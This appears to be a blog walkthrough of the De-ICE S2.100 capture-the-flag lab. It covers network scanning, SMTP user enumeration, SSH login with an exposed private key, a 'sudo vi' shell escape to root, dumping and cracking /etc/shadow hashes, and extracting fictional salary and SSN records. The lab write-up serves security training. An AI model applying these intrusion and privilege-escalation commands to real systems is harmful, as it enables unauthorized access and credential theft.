I had never done the S2 LiveCD; honestly I didn’t know it existed until I was looking for the download links for the series 1 set. This is basically a clean up to date walkthrough using Kali. All of the spoilers are in the walkthrough as not to ruin the pen testing fun. Have fun and hopefully these are helpful.
SE-ICE S2.100
Download Link: https://download.vulnhub.com/deice/De-ICE_S2.100_%28de-ice.net-2.100-1.0%29.iso
Scenario: The scenario for this LiveCD is that you have been given an assignment to test a company’s 192.168.2.xxx network to identify any vulnerabilities or exploits. The systems within this network are not critical systems and recent backups have been created and tested, so any damage you might cause is of little concern. The organization has had multiple system administrators manage the network over the last couple of years, and they are unsure of the competency previous (or current) staff.
Default IP: 192.168.2.100
Flags:
1. Port scan host and create list of open ports
2. Obtain access to file system
3. Perform post exploitation
4. Rummage about in the file system
4. FINAL FLAG: Find salary and Social Security Information for employees
Spoilers and Walkthrough
Using netdiscover to find the potential addresses I found the .100 and .101 addresses active.
root@kali:~# netdiscover Currently scanning: 192.168.4.0/16 | Screen View: Unique Hosts 5 Captured ARP Req/Rep packets, from 5 hosts. Total size: 300 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.2.1 00:50:56:c0:00:08 1 60 Unknown vendor 192.168.2.2 00:50:56:f0:ee:65 1 60 Unknown vendor 192.168.2.100 00:0c:29:1f:c6:f0 1 60 Unknown vendor 192.168.2.101 00:0c:29:1f:c6:f0 1 60 Unknown vendor 192.168.2.254 00:50:56:fe:3a:17 1 60 Unknown vendor
I’ll start by creating a metasploit workspace and doing a port scan of the host. The name for the workspace is terrible but since I didn’t know that I would be differentiating between series 1 and 2 but it works.
workspace -a de-ice2-100 workspace de-ice2-100 db_nmap -T5 -p 0-65535 -A 192.168.2.100-101
I have had great success in numerous penetration tests with data in FTP so I will start there. Personally I like to use the filezilla GUI, I know that goes against everything that makes pen testing fun so feel free to use the command line. The anonymous user doesn’t perform a directory listing or show any files so lets dig into the vsftpd service. Searchsploit is the local version of the exploit-db database with the added benefit of not having to click on the CAPTCHA box.
root@kali:~# searchsploit vsftp --------------------------------------------- ---------------------------------- Exploit Title | Path | (/usr/share/exploitdb/platforms/) --------------------------------------------- ---------------------------------- vsftpd 2.0.5 - 'CWD' Authenticated Remote Me | linux/dos/5814.pl vsftpd 2.3.2 - Denial of Service | linux/dos/16270.c vsftpd 2.0.5 - 'deny_file' Option Remote Den | windows/dos/31818.sh vsftpd 2.0.5 - 'deny_file' Option Remote Den | windows/dos/31819.pl vsftpd 2.3.4 - Backdoor Command Execution (M | unix/remote/17491.rb --------------------------------------------- ----------------------------------
Nothing specific for that version and mostly denial-of-service attacks so for now we can move on. Lets see what mischief we can get into with the web site. From the website directory we can harvest a list of users and email addresses for use later. In a real-world penetration test this would be the start for a well orchestrated phishing campaign.
Samuel Pickwick | pickwick@herot.net |
---|---|
Nathaniel Winkle | winkle@herot.net |
Augustus Snodgrass | snodgrass@herot.net |
Tracy Tupman | tupman@herot.net |
Sam Weller | weller@herot.net |
Tony Weller | tweller@herot.net |
Estella Havisham | havisham@herot.net |
Abel Magwitch | magwitch@herot.net |
Philip Pirrip | pirrip@herot.net |
Nicholas Nickleby | nickleby@herot.net |
Ralph Nickleby | rnickleby@herot.net |
Newman Noggs | noggs@herot.net |
Wackford Squeers | squeers@herot.net |
Thomas Pinch | pinch@herot.net |
Mark Tapley | tapley@herot.net |
Sarah Gamp | gamp@herot.net |
Jacob Marley | marley@herot.net |
Ebenezer Scrooge | scrooge@herot.net |
Bob Cratchit | cratchit@herot.net |
Bill Sikes | sikes@herot.net |
Jack Dawkins | dawkins@herot.net |
Noah Claypole | claypole@herot.net |
The .101 website looks like a generic policy site so lets dig deeper into bother of them. Nikto finds some generic problems with the server but nothing that is immediately exploitable.
nikto -h 192.168.2.100 nikto -h 192.168.2.101 + OSVDB-3268: /~root/: Directory indexing found. + OSVDB-637: /~root/: Allowed to browse root's home directory.
Lets rummage around in that directory. Nada.
During the Nmap scan we found out that the SMTP server has the VRFY verb enabled allowing us to determine potential user accounts for a brute force attack. The list is fairly simple, last name only, first name only, and first initial last name.
Pickwick |
---|
Winkle |
Snodgrass |
Tupman |
Weller |
Weller |
Havisham |
Magwitch |
Pirrip |
Nickleby |
Nickleby |
Noggs |
Squeers |
Pinch |
Tapley |
Gamp |
Marley |
Scrooge |
Cratchit |
Sikes |
Dawkins |
Claypole |
Samuel |
Nathaniel |
Augustus |
Tracy |
Sam |
Tony |
Estella |
Abel |
Philip |
Nicholas |
Ralph |
Newman |
Wackford |
Thomas |
Mark |
Sarah |
Jacob |
Ebenezer |
Bob |
Bill |
Jack |
Noah |
spickwick |
nwinkle |
asnodgrass |
ttupman |
sweller |
tweller |
ehavisham |
amagwitch |
ppirrip |
nnickleby |
rnickleby |
nnoggs |
wsqueers |
tpinch |
mtapley |
sgamp |
jmarley |
escrooge |
bcratchit |
bsikes |
jdawkins |
nclaypole |
Metasploit has an SMTP enumeration module that we will use.
msf > use auxiliary/scanner/smtp/smtp_enum msf auxiliary(smtp_enum) > set USER_FILE /root/Desktop/s2100users.txt USER_FILE => /root/Desktop/s2100users.txt msf auxiliary(smtp_enum) > set RHOSTS 192.168.2.100 RHOSTS => 192.168.2.100 msf auxiliary(smtp_enum) > run [*] 192.168.2.100:25 - 192.168.2.100:25 Banner: 220 slax.example.net ESMTP Sendmail 8.13.7/8.13.7; Wed, 19 Apr 2017 12:00:02 GMT [+] 192.168.2.100:25 - 192.168.2.100:25 Users found: Havisham, Magwitch, Pirrip [*] Scanned 1 of 1 hosts (100% complete)
We now have three verified usernames to start an attack (Havisham, Magwitch, Pirrip). The .101 address had a ~root directory that was readable so lets check for those user directories. Good news, there aren’t any files in these either but all three exist. What files do we expect to see in a users home folder? I made a dump of my home folder to answer this question and some of the items that are obviously penetration testing tools. Linux hides folders that start with a . so lets dump this into a wordlist and get started.
root@kali:~# ls -a . core .ICEauthority .nano Templates .. Desktop .install4j .oracle_jre_usage Videos .bash_history Documents .java Pictures .w3af .bashrc Downloads .john .profile .wget-hsts .bundle .faraday .local Public .BurpSuite .gconf .mozilla .rnd .cache .gnupg .msf4 .sqlmap .config .halberd Music .sshModule options (auxiliary/scanner/http/dir_scanner): Name Current Setting Required Description ---- --------------- -------- ----------- DICTIONARY /root/Desktop/webwordlist.txt no Path of word dictionary to use PATH /~root yes The path to identify files Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.2.101 yes The target address range or CIDR identifier RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections THREADS 256 yes The number of concurrent threads VHOST no HTTP server virtual host msf auxiliary(dir_scanner) > run [*] Detecting error code [*] Using code '404' as not found for 192.168.2.101 [*] Found http://192.168.2.101:80/~root/../ 404 (192.168.2.101) [*] Found http://192.168.2.101:80/~root/./ 404 (192.168.2.101) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(dir_scanner) > set PATH /~magwitch PATH => /~magwitch msf auxiliary(dir_scanner) > run [*] Detecting error code [*] Using code '404' as not found for 192.168.2.101 [*] Found http://192.168.2.101:80/~magwitch/./ 404 (192.168.2.101) [*] Found http://192.168.2.101:80/~magwitch/../ 404 (192.168.2.101) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(dir_scanner) > set PATH /~havisham PATH => /~havisham msf auxiliary(dir_scanner) > run [*] Detecting error code [*] Using code '404' as not found for 192.168.2.101 [*] Found http://192.168.2.101:80/~havisham/../ 404 (192.168.2.101) [*] Found http://192.168.2.101:80/~havisham/./ 404 (192.168.2.101) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(dir_scanner) > set PATH /~pirrip PATH => /~pirrip msf auxiliary(dir_scanner) > run [*] Detecting error code [*] Using code '404' as not found for 192.168.2.101 [*] Found http://192.168.2.101:80/~pirrip/../ 404 (192.168.2.101) [*] Found http://192.168.2.101:80/~pirrip/./ 200 (192.168.2.101) [*] Found http://192.168.2.101:80/~pirrip/.ssh/ 404 (192.168.2.101) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
The bold line above doesn’t show up in the other three but it has a 404 error which is odd also the /./ is a 200 code instead of a 404. Lets take a closer look.
That sure looks like it exists. Lets take a quick detour into SSH to explain why this is important. SSH allows for password based authentication like we saw in the De-ICE series 1 LiveCDs it also can use Public Key encryption which relies on a generated public/private key pair. Having the id_rsa file is almost as good as having a the password in cleartext. Copy those two files to your .ssh local folder. Linux gets really upset if you don’t have 600 permissions set on id_rsa files so this saves a step of getting the error message, looking up the fix, and trying again.
root@kali:~/Desktop# ssh -i id_rsa pirrip@192.168.2.100 The authenticity of host '192.168.2.100 (192.168.2.100)' can't be established. RSA key fingerprint is SHA256:Z26/6SkV1lodQR++6+78wD4acFpG2KigCTuwo04+Xlw. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.2.100' (RSA) to the list of known hosts. Linux 2.6.16. pirrip@slax:~$ id uid=1000(pirrip) gid=10(wheel) groups=10(wheel) pirrip@slax:~$ su - Password: **** Sorry.
We don’t know the password so even being a member of the wheel group doesn’t help much. There isn’t much to work with in the file system either. In a normal penetration test you could use this system to pivot into others or upload a netcat or meterpreter shell. In this case since this is the only system in scope let look at other potential data sources. We know this is a mail server so:
pirrip@slax:~$ mail mailx version nail 11.25 7/29/05. Type ? for help. "/var/mail/pirrip": 7 messages 7 new >N 1 Abel Magwitch Sun Jan 13 23:53 20/748 Estella N 2 Estella Havisham Sun Jan 13 23:53 20/780 welcome to the team N 3 Abel Magwitch Sun Jan 13 23:53 20/875 havisham N 4 Estella Havisham Mon Jan 14 00:05 20/861 next month N 5 Abel Magwitch Mon Jan 14 00:05 20/868 vacation N 6 Abel Magwitch Mon Jan 14 00:05 20/915 vacation N 7 noreply@fermion.he Mon Jan 14 00:05 29/983 Fermion Account Login Rem ? Message 1: From magwitch@slax.example.net Sun Jan 13 23:53:37 2008 Return-Path: <magwitch@slax.example.net> From: Abel Magwitch <magwitch@slax.example.net> Date: Sun, 13 Jan 2008 23:47:48 +0000 To: pirrip@slax.example.net Subject: Estella User-Agent: nail 11.25 7/29/05 Content-Type: text/plain; charset=us-ascii Status: R Will do. ? Message 2: From havisham@slax.example.net Sun Jan 13 23:53:37 2008 Return-Path: <havisham@slax.example.net> From: Estella Havisham <havisham@slax.example.net> Date: Sun, 13 Jan 2008 23:50:33 +0000 To: pirrip@slax.example.net Subject: welcome to the team User-Agent: nail 11.25 7/29/05 Content-Type: text/plain; charset=us-ascii Status: R Thanks! Glad to be here. ? Message 3: From magwitch@slax.example.net Sun Jan 13 23:53:37 2008 Return-Path: <magwitch@slax.example.net> From: Abel Magwitch <magwitch@slax.example.net> Date: Sun, 13 Jan 2008 23:48:57 +0000 To: pirrip@slax.example.net Subject: havisham User-Agent: nail 11.25 7/29/05 Content-Type: text/plain; charset=us-ascii Status: R I set her up with an accountus servers. I set her password to "changeme" and will swing by tomorrow and make sure she changes her pw. ? Message 4: From havisham@slax.example.net Mon Jan 14 00:05:15 2008 Return-Path: <havisham@slax.example.net> From: Estella Havisham <havisham@slax.example.net> Date: Mon, 14 Jan 2008 00:03:56 +0000 To: pirrip@slax.example.net Subject: next month User-Agent: nail 11.25 7/29/05 Content-Type: text/plain; charset=us-ascii Status: R Abel filled me in about next month. I wanted to ask you if I can grab the week you get back for vacation? Thanks. ? Message 5: From magwitch@slax.example.net Mon Jan 14 00:05:15 2008 Return-Path: <magwitch@slax.example.net> From: Abel Magwitch <magwitch@slax.example.net> Date: Sun, 13 Jan 2008 23:55:41 +0000 To: pirrip@slax.example.net Subject: vacation User-Agent: nail 11.25 7/29/05 Content-Type: text/plain; charset=us-ascii Status: R Hey, I'll be taking vacation the second week of next month. Have any additional tasks that need to be taen care of in advance? ? Message 6: From magwitch@slax.example.net Mon Jan 14 00:05:15 2008 Return-Path: <magwitch@slax.example.net> From: Abel Magwitch <magwitch@slax.example.net> Date: Sun, 13 Jan 2008 23:58:28 +0000 To: pirrip@slax.example.net Subject: vacation User-Agent: nail 11.25 7/29/05 Content-Type: text/plain; charset=us-ascii Status: R Sure - so far, she's doing just fine. I have assigned her a couple web issues and the ftp installation for 2.100. She seems to be very comfortable, even with the new stuff. ? Message 7: From noreply@fermion.herot.net Mon Jan 14 00:05:15 2008 Return-Path: <noreply@fermion.herot.net> From: noreply@fermion.herot.net Date: Sun, 13 Jan 2008 23:54:42 +0000 To: pirrip@slax.example.net Subject: Fermion Account Login Reminder User-Agent: nail 11.25 7/29/05 Content-Type: text/plain; charset=us-ascii Status: R Fermion Account Login Reminder Listed below are your Fermion Account login credentials. Please let us know if you have any questions or problems. Regards, Fermion Support E-Mail: pirrip@slax.example.net Password: 0l1v3rTw1st
From the email exchange we have to potential sets of credentials havisham:changeme and pirrip:0l1v3rTw1st. Lets try to get elevated privileges with the pirrip password first, since we are already logged in.
pirrip@slax:~$ sudo -l We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility. Password: User pirrip may run the following commands on this host: (root) /usr/bin/more (root) /usr/bin/tail (root) /usr/bin/vi (root) /usr/bin/cat ALL
vi can be used to get shell, I learned this in a long drawn out penetration test where I got a similar restricted shell through the Shellshock vulnerability. In vi the :! command instructs vi to execute a shell command, lets try it.
pirrip@slax:~$ sudo vi :!/bin/sh sh-3.1# cat /etc/shadow root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0::::: bin:*:9797:0::::: daemon:*:9797:0::::: adm:*:9797:0::::: lp:*:9797:0::::: sync:*:9797:0::::: shutdown:*:9797:0::::: halt:*:9797:0::::: mail:*:9797:0::::: news:*:9797:0::::: uucp:*:9797:0::::: operator:*:9797:0::::: games:*:9797:0::::: ftp:*:9797:0::::: smmsp:*:9797:0::::: mysql:*:9797:0::::: rpc:*:9797:0::::: sshd:*:9797:0::::: gdm:*:9797:0::::: pop:*:9797:0::::: nobody:*:9797:0::::: pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7::: magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7::: havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7::: :q
Use :q to exit vi. Feed the password hashes to John or Hashcat and let it cook! Time passes, seasons change. The wedding dress becomes torn and the feast rots on the table, I had to read Charles Dickens in college.
root | P1ckw1ckP@p3rs |
---|---|
havisham | changeme |
pirrip | 0l1v3rTw1st |
magwitch |
pirrip@slax:~$ su - Password: ************** root@slax:~# ls -a ./ .ICEauthority .Xresources .fluxbox/ .fonts.conf .joerc .kderc .mc/ .qt/ Desktop/ ../ .Xauthority .config/ .fonts.cache-1 .icons@ .kde/ .local/ .mplayer/ .save/ Set\ IP\ address root@slax:~# cd .save root@slax:~/.save# ls -a ./ ../ great_expectations.zip*
We found the file but how do we get it over to our system to check it out? There are a few possible options.
- Build a netcat listener and pipe the file over.
- Move the file to the FTP root and copy it across.
- Move it to the ~root directory and download it from the website.
Netcat is installed on server and this is an option but I am lazy so I ran the following commands to copy the file to the website and give read permissions to everyone:
/home/root/.save# cp great_expectations.zip /www/101/home/root/ chmod 744 great_expectations.zip
After copying it to the local system unzip the archive and untar the file from the zip.
unzip great_expectations.zip tar -xzf great_expectations.tar
The greatest piece of advice that I have received on Linux is how to remember the tar switches; say the following in a thick cartoonish german accent ‘Extract Zee Files’. tar -xzf, will this sound dumb when you do it? Yes. Will you remember it without looking at help? Yes.
The Charles_Dickens_3.jpg and Great_Expectations.pdf are pretty self explanatory. Lets look at the Jan08 file cat.
root@kali:~/Desktop/s2-100/great_expectations# cat Jan08 From sikes@slax.example.net Sun Jan 13 23:53:37 2008 Return-Path: <sikes@slax.example.net> Received: from slax.example.net (localhost [127.0.0.1]) by slax.example.net (8.13.7/8.13.7) with ESMTP id m0DNlmHb009636 for <pirrip@slax.example.net>; Sun, 13 Jan 2008 23:47:48 GMT Received: (from sikes@slax.example.net) by slax.example.net (8.13.7/8.13.7/Submit) id m0DNlmDI009635 for pirrip; Sun, 13 Jan 2008 23:47:48 GMT From: Bill Sikes <sikes@slax.example.net> Message-Id: <200801132347.m0DNlmDI009635@slax.example.net> Date: Sun, 13 Jan 2008 23:47:48 +0000 To: pirrip@slax.example.net Subject: Raises User-Agent: nail 11.25 7/29/05 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Here's the data for raises for your team: Philip Pirrip: 734-67-0424 5.5% $74,224 Abel Magwitch: 816-03-0028 4.0% $53,122 Estella Havisham: 762-93-1073 12% $84,325
That is the data we were looking for. But, what about that other .jpg file that won’t do a preview? It won’t open in image software, maybe they are trying to obfuscate the file type by changing the extension? Use the file command in Linux to analyze the type.
file 363px-Charles_dickensyoung.jpg 363px-Charles_dickensyoung.jpg: POSIX tar archive (GNU)
Thats not a JPG at all! Lets rename the file and take a look inside. Maybe that Jan08 file was a decoy. Nope it as just a second copy of the original archive but now you know how to file command. This was the best of times and the worst of times. I hope that you learned at least one thing that you will be able to put into practice in the future.